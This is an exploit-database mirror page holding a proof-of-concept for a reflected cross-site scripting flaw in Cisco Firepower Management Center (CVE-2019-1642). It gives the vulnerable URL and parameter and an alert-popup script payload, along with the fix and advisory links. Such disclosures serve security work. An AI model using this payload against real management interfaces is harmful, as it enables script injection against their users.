bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/46263.txt
Offensive Security f700c5347d DB: 2019-01-31 
8 changes to exploits/shellcodes

Advanced File Manager 3.4.1 - Denial of Service (PoC)
iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure
IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)
Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)
HTML5 Video Player 1.2.5 - Local Buffer Overflow - Non SEH
Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH) (DEP Bypass)
HTML5 Video Player 1.2.5 - Local Buffer Overflow (Non SEH)
10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)

PDF Signer 3.0 - SSTI to RCE via CSRF Cookie
PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)
Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection

Windows/x86 - 'msiexec.exe' Download and Execute Shellcode (95 bytes)
2019-01-31 05:01:49 +00:00

30 lines
No EOL
1.9 KiB
Text
Raw Blame History

# Exploit Title: Cisco Firepower Management Center Cross-Site Scripting (XSS) Vulnerability
# Google Dork: N/A
# Date: 23-01-2019
################################
# Exploit Author: Bhushan B. Patil
################################
# Advisory URL: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss
# Affected Version: 6.2.2.2 & 6.2.3
# Cisco Bug ID: CSCvk30983
# CVE: CVE-2019-1642
1. Technical Description:
A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the affected software.
The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
2. Proof Of Concept:
Login to Cisco Firepower Management Center (FMC) and browse to Systems -> Configuration menu.
https://<ip address>/platinum/platformSettingEdit.cgi?type=TimeSetting
Append the following XSS payload >"><script>alert("XXS POC")</script>& in the URL
The URL will become and on submitting it you'll get an alert popup.
https://<ip address>/platinum/platformSettingEdit.cgi?type=>"><script>alert("XXS POC")</script>&
3. Solution:
Upgrade to version 6.3.0
For more information about fixed software releases, consult the Cisco bug ID CSCvk30983<https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvk30983>
4. Reference:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-frpwr-mc-xss
Reference in a new issue View git blame Copy permalink